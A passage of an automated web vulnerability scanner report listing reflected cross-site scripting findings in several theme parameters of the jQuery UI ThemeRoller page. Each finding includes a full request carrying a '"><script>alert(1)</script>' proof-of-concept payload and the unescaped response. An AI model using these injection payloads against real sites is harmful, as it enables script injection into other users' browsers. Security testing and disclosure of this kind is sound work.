ighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngffe15"><script>alert(1)</script>b095b5c9bc8&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngffe15"><script>alert(1)</script>b095b5c9bc8&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

3.67. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bee3"><script>alert(1)</script>07f42324772 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png8bee3"><script>alert(1)</script>07f42324772&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png8bee3"><script>alert(1)</script>07f42324772&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

3.68. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2587"><script>alert(1)</script>912a8c95f83 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngd2587"><script>alert(1)</script>912a8c95f83&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngd2587"><script>alert(1)</script>912a8c95f83&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

3.69. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ef80"><script>alert(1)</script>7d60f528328 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png1ef80"><script>alert(1)</script>7d60f528328&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png1ef80"><script>alert(1)</script>7d60f528328&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

3.70. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1081b"><script>alert(1)</script>32da48d3a73 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png1081b"><script>alert(1)</script>32da48d3a73&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png1081b"><script>alert(1)</script>32da48d3a73&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

3.71. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e3d"><script>alert(1)</script>e48f9fe676e was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngf0e3d"><script>alert(1)</script>e48f9fe676e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngf0e3d"><script>alert(1)</script>e48f9fe676e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.72. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65cd7"><script>alert(1)</script>fc8cfd864d1 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa65cd7"><script>alert(1)</script>fc8cfd864d1&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa65cd7"><script>alert(1)</script>fc8cfd864d1&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

3.73. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f05c"><script>alert(1)</script>260217d18f0 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa5f05c"><script>alert(1)</script>260217d18f0&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
hlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa5f05c"><script>alert(1)</script>260217d18f0&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dada
...[SNIP]...

3.74. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb0dc"><script>alert(1)</script>0438cc2541 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3fb0dc"><script>alert(1)</script>0438cc2541&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3fb0dc"><script>alert(1)</script>0438cc2541&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextur
...[SNIP]...

3.75. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200d2"><script>alert(1)</script>efe4a57817 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a200d2"><script>alert(1)</script>efe4a57817&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
